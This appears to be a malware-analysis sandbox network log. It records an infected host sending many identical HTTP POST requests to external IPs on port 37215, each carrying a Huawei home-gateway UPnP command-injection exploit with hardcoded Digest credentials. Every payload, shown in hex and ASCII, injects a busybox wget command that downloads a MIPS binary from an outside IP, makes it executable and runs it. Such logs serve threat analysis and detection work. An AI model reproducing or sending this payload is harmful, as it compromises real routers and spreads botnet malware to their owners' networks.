                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            100192.168.2.133629441.12.156.19737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.955351114 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            101192.168.2.1338414156.167.122.4137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.956134081 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            102192.168.2.133935441.113.11.6837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.956929922 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            103192.168.2.135105041.41.95.20137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.957760096 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            104192.168.2.134416441.26.2.237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.958704948 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            105192.168.2.134727241.201.89.18037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.959523916 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            106192.168.2.135603441.66.186.6537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.960374117 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            107192.168.2.1342564197.27.200.12737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.961213112 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            108192.168.2.1356114156.237.170.7637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.962047100 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            109192.168.2.1358138156.59.177.1537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.962891102 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 